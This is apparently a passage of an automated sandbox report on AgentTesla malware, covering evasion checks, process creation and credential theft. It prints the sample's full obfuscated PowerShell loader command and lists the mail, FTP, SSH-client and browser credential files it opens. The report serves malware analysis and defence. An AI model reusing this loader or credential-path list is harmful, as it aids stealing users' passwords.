            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 3308Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 3308Thread sleep time: -90000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 4272Thread sleep count: 685 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 4272Thread sleep time: -342500s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 3308Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9040
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: threadDelayed 685
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 30000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 30000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: ModuleInformation
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 0000000C.00000002.91096675961.00000000014A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: CasPol.exe, 0000000C.00000002.91095102327.0000000001440000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
            Source: powershell.exe, 00000006.00000002.86781234856.000000000734F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe,
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: powershell.exe, 00000006.00000002.86777664245.0000000007280000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_20496418 LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMemory allocated: page read and write | page guard
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$biliate = """laabrdgedga-sttdiycopsteun st-udthoyaupepewrdreetrfpaiusnumiretcoimaofrnsv sm'reusksunifuncogkn tosphyprsjatnuesimst;viusmsprisknangim prsplyeusgrtgueoemfo.rerpuuconhutsoifrmfreil.joifonsntsnelurcoopapjastrererelvkuiticreefesbr;ampupukobsnlvoidecaw sasrutrhajetaaitecsv brceslfoaunsvasle ebtinubaebaiourceokonpr1ci sh{ti[phdaflullbuimimhapmaoafreutan(ad`"""inuluskiekarme3br2si`"""rr)ri]gopmauflbstlmeitycsa aeskatinahjtsmisvcne stehoxattimeteropnna gribenbrtno yddmierestotenrbrostyovcspamermiecotkl(sn)me;sm[afdepllulreienmflprdoharegtbr(ov`"""migaldmeipl3in2er`"""te)ce]tapeuudrbculmaihjcas lgsudttrabrtsqiercco viebextetveetrrhrnma foibanartha stsbrcudagrllaeskwteiscnsudreobuwcrevexchtstesuxkn(noifinkutse modlnrigibefratpl,reiannaltju beaudmambmiupalheaap,diifonkntsp jubprasesvaoqu,mailenimtba noiafadagvrtpotsyaov,chigenpltre divsaetvjsimboasotan1un5fr8ud,giitinstter yemsucslgkursk)eg;ak[kuddilbulimirdmampanovarprtfr(sk`"""svksqerorpinflerelpa3ov2as`"""tr)wo]hepmeurobbalfrilucre hysmitfoaunttaitmcja anedexmitkuesarblnoi reifansutov drhdeestabapblsbeispzbaeko(stiunnditou ycpkerbrourpre,phisonxatcl aianodstrchefosov,viidenjutdi mutimowerartinrfripo)mo;co[sldoplsalspiapmunpreosjrrotko(wh`"""jgsschdiebilshlko3ge2re.vaduflomlun`"""st)un]beppauslboslbeiuncas masmntsyaletfritrcpr noevixratfoererwenun sevenofuitrdrh padterflafigmefciiennstikasbehmi(esibonsutpo opomumpldserge)ba;ej[spdfalbelmeilimhepfroudrgutau(je`"""mawskifantemnumin.apdkolbolfl`"""fu)ho]scpovuprbmdlviialcba bossatasahotliifocsi veenoxluthaebirjenla hoiennnatgu armtjihoxscedartrgswejotcodtrefivsuckeamipqussu(skiblncitch benpribrtserud,uditincotjo vafaseewlob,thivinquteo noaphfafsxi9im3bl)ta;ls[chdculcalhaipumcipicofarretsl(be`"""rekgletrrhinatesilek3sa2ur`"""ti)de]papfeudrbfolopilkctn busabtsyaudtmeisocfr coeimxfatmoefrrnanto trimentotal kaludoescaskqurosepasphoovuforjucapeph(roiafncotte velexesoiun)ir;un[redpiliwloyilammipshostrfatcr(bo`"""flkauecervantoejelav3pl2re`"""se)co]unpanucoboplfoilacla casrotopauntmuikacti wieknxentreeudrtrntr ariponintsl pivinistrpetrauacatilvaatelbelclothcfa(tristnsotwi gevgr1sk,smilunthtor cavbl2ne,keistncotby hevdr3pa,heiganuptku svvca4in)pr;py[drdmalinlpribrmhepploknrpttba(ho`"""craundbevalatopanicr3st2ph.wadbelsalci`"""to)un]stptiurebsylpuiencfo cosmotunaunthuiatcst meemixdotofeadrinnro suvbeoupividti cimtrabipbegateoensleglrpribrccomfiaunsankvn(saisknmetpe plbinrtriodnobkir,doidenqutru camchiuddtitknssn)in;ov[trdrelselfuiunmripgoosuromtsc(ve`"""brkvaemermanpeesklst3co2in`"""ef)ce]bepkoumybkollbicocun edsgatkuatetkoiaaclu noevexprtneeunranncy prisenlvtplpfotborkr scegansuumemfuschyfrspotbeeoomfjlguoflcsranelgaevosprwun(paudiieynsttpe grvex1ma,psihankoten kovgr2ha)et;om[oodrhldilflisumenpskoovrtrtsp(st`"""obkedeelrrentaedaldi3sc2di`"""si)ni]fopchutlbdalcaialcli smsnytvaaretprisuctr luebexgattregermanbr reigunentan unsgieunttiten
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$biliate = """laabrdgedga-sttdiycopsteun st-udthoyaupepewrdreetrfpaiusnumiretcoimaofrnsv sm'reusksunifuncogkn tosphyprsjatnuesimst;viusmsprisknangim prsplyeusgrtgueoemfo.rerpuuconhutsoifrmfreil.joifonsntsnelurcoopapjastrererelvkuiticreefesbr;ampupukobsnlvoidecaw sasrutrhajetaaitecsv brceslfoaunsvasle ebtinubaebaiourceokonpr1ci sh{ti[phdaflullbuimimhapmaoafreutan(ad`"""inuluskiekarme3br2si`"""rr)ri]gopmauflbstlmeitycsa aeskatinahjtsmisvcne stehoxattimeteropnna gribenbrtno yddmierestotenrbrostyovcspamermiecotkl(sn)me;sm[afdepllulreienmflprdoharegtbr(ov`"""migaldmeipl3in2er`"""te)ce]tapeuudrbculmaihjcas lgsudttrabrtsqiercco viebextetveetrrhrnma foibanartha stsbrcudagrllaeskwteiscnsudreobuwcrevexchtstesuxkn(noifinkutse modlnrigibefratpl,reiannaltju beaudmambmiupalheaap,diifonkntsp jubprasesvaoqu,mailenimtba noiafadagvrtpotsyaov,chigenpltre divsaetvjsimboasotan1un5fr8ud,giitinstter yemsucslgkursk)eg;ak[kuddilbulimirdmampanovarprtfr(sk`"""svksqerorpinflerelpa3ov2as`"""tr)wo]hepmeurobbalfrilucre hysmitfoaunttaitmcja anedexmitkuesarblnoi reifansutov drhdeestabapblsbeispzbaeko(stiunnditou ycpkerbrourpre,phisonxatcl aianodstrchefosov,viidenjutdi mutimowerartinrfripo)mo;co[sldoplsalspiapmunpreosjrrotko(wh`"""jgsschdiebilshlko3ge2re.vaduflomlun`"""st)un]beppauslboslbeiuncas masmntsyaletfritrcpr noevixratfoererwenun sevenofuitrdrh padterflafigmefciiennstikasbehmi(esibonsutpo opomumpldserge)ba;ej[spdfalbelmeilimhepfroudrgutau(je`"""mawskifantemnumin.apdkolbolfl`"""fu)ho]scpovuprbmdlviialcba bossatasahotliifocsi veenoxluthaebirjenla hoiennnatgu armtjihoxscedartrgswejotcodtrefivsuckeamipqussu(skiblncitch benpribrtserud,uditincotjo vafaseewlob,thivinquteo noaphfafsxi9im3bl)ta;ls[chdculcalhaipumcipicofarretsl(be`"""rekgletrrhinatesilek3sa2ur`"""ti)de]papfeudrbfolopilkctn busabtsyaudtmeisocfr coeimxfatmoefrrnanto trimentotal kaludoescaskqurosepasphoovuforjucapeph(roiafncotte velexesoiun)ir;un[redpiliwloyilammipshostrfatcr(bo`"""flkauecervantoejelav3pl2re`"""se)co]unpanucoboplfoilacla casrotopauntmuikacti wieknxentreeudrtrntr ariponintsl pivinistrpetrauacatilvaatelbelclothcfa(tristnsotwi gevgr1sk,smilunthtor cavbl2ne,keistncotby hevdr3pa,heiganuptku svvca4in)pr;py[drdmalinlpribrmhepploknrpttba(ho`"""craundbevalatopanicr3st2ph.wadbelsalci`"""to)un]stptiurebsylpuiencfo cosmotunaunthuiatcst meemixdotofeadrinnro suvbeoupividti cimtrabipbegateoensleglrpribrccomfiaunsankvn(saisknmetpe plbinrtriodnobkir,doidenqutru camchiuddtitknssn)in;ov[trdrelselfuiunmripgoosuromtsc(ve`"""brkvaemermanpeesklst3co2in`"""ef)ce]bepkoumybkollbicocun edsgatkuatetkoiaaclu noevexprtneeunranncy prisenlvtplpfotborkr scegansuumemfuschyfrspotbeeoomfjlguoflcsranelgaevosprwun(paudiieynsttpe grvex1ma,psihankoten kovgr2ha)et;om[oodrhldilflisumenpskoovrtrtsp(st`"""obkedeelrrentaedaldi3sc2di`"""si)ni]fopchutlbdalcaialcli smsnytvaaretprisuctr luebexgattregermanbr reigunentan unsgieunttiten
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7743.tmp" "c:\Users\user\AppData\Local\Temp\0j5ctfzr\CSC3A80B568F8BB4D66897E5CE811419E16.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_079DD7E4 CreateNamedPipeW,

            Stealing of Sensitive Information

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5484, type: MEMORYSTR
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Tries to harvest and steal ftp login credentials
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara matchFile source: 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5484, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5484, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_010E4A7A bind,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_010E4A55 bind,

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		2
            OS Credential Dumping            		1
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Exfiltration Over Alternative Protocol            		2
            Ingress Tool Transfer            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts321
            Scripting            		Boot or Logon Initialization Scripts1
            Access Token Manipulation            		1
            Deobfuscate/Decode Files or Information            		1
            Credentials in Registry            		115
            System Information Discovery            		Remote Desktop Protocol2
            Data from Local System            		Exfiltration Over Bluetooth11
